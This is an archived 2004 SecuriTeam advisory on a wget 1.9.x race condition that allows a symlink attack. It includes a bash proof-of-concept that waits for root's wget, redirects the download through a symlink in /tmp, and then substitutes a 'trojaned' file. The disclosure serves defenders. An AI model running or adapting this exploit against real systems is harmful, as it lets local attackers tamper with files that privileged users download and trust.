[UNIX] Wget Race Condition Vulnerability Allows a Symlink Attack

From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/04

  • Next message: SecuriTeam: "[TOOL] Xxpoof - Spoofed Packet Generator for Windows"
    To: list@securiteam.com
    Date: 18 May 2004 19:05:50 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Wget Race Condition Vulnerability Allows a Symlink Attack
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.gnu.org/directory/wget.html> Wget is a network utility to
    retrieve files from the Web using http and ftp, the two most widely used
    Internet protocols. It works non-interactively, so it will work in the
    background, after having logged off. The program supports recursive
    retrieval of web-authoring pages as well as ftp sites you can use wget to
    make mirrors of archives and home pages or to travel the Web like a WWW
    robot."

    It is possible to create a symbolic link attack on wget when retrieving
    files, which will result in a file written in a completely different
    location than intended.

    DETAILS

    Vulnerable Systems:
     * Wget versions 1.9, 1.9.1, possibly prior

    Wget checks for the presence of a file with the same name as the one
    invoked at the command line. If the file exists, it saves the downloaded
    file under a different name. The problem stems from not locking the file
    prior to writing to it, which allows an attacker to create a symbolic link
    from the file to another file before wget is writing it, thereby diverting
    the output to anywhere desired (on world writeable directories naturally).

    An example of an attack sequence:
     * Wget process starts
     * File checking (but not locking!)
     * Attacker creates a symlink
     * Wget writes to the wrong place

    Exploit:
    A proof-of-concept script is provided that can be used in the following
    manner:
     * Open a shell and execute wget_race.sh with user A
     * Open another shell and with root user launch wget from /tmp:
            wget http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.26.bz2
     * Check the content of /tmp/patch-2.4.26.bz2

    #!/bin/bash

    rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
    echo "1">salida.txt
    a=`cat salida.txt`
    echo "Waiting for Wget execution..."

    while [ "$a" == 1 ]
    do
       ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
       a=`cat salida.txt`
    done

    echo "Process catched!"
    pgrep -u root wget>pid.txt
    ln -s /dev/null /tmp/patch-2.4.26.bz2
    echo "/dev/null link created!"
    echo "Waiting for downloading to finish..."

    b=`pgrep -u root wget`
    touch $b.wget
    c=1
    while [ "$c" == 1 ]
    do
      if [ -e .wget ]
      then
        c=0
        echo "Downloading finished! Let's delete the original file, and put
    our trojaned file :-)"
        rm -f /tmp/patch-2.4.26.bz2
        echo "Surprise!">/tmp/patch-2.4.26.bz2
    echo "Does it worked "

        ls -la /tmp/patch-2.4.26.bz2

      else
      b=`pgrep -u root wget`
      touch $b.wget

      fi

    done

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:overclocking_a_la_abuela@hotmail.com> ugo "VXzquez" CaramXs.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[TOOL] Xxpoof - Spoofed Packet Generator for Windows"

    Relevant Pages

    • [EXPL] wget Directory Traversal (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... wget is "a freely available utility for downloading files using the HTTP, ... chomp $payload; ...
      (Securiteam)
    • Wget race condition vulnerability
      ... Tested software: Wget 1.9, Wget 1.9.1 ... Wget process starts ... echo "Waiting for Wget execution..." ... b=`pgrep -u root wget` ...
      (Bugtraq)
    • [UNIX] Bacula Insecure Temporary File Creation and Information Disclosure
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... allow attackers to cause symbolic link attacks to create arbitrary files ... 17 echo "quit">>$tmp ... They are 2 vulnerabilities, symlink attack and password ...
      (Securiteam)
    • [EXPL] Claroline Remote Code Execution (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Claroline Remote Code Execution ... echo "by rgod rgod at autistici.org\r\n"; ...
      (Securiteam)
    • [EXPL] myBlogger trackback SQL Injection
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in myBloggie allows remote attackers ... echo "administrative credentials disclosure exploit\n"; ... echo 'No response from '.$host.':'.$port; die; ...
      (Securiteam)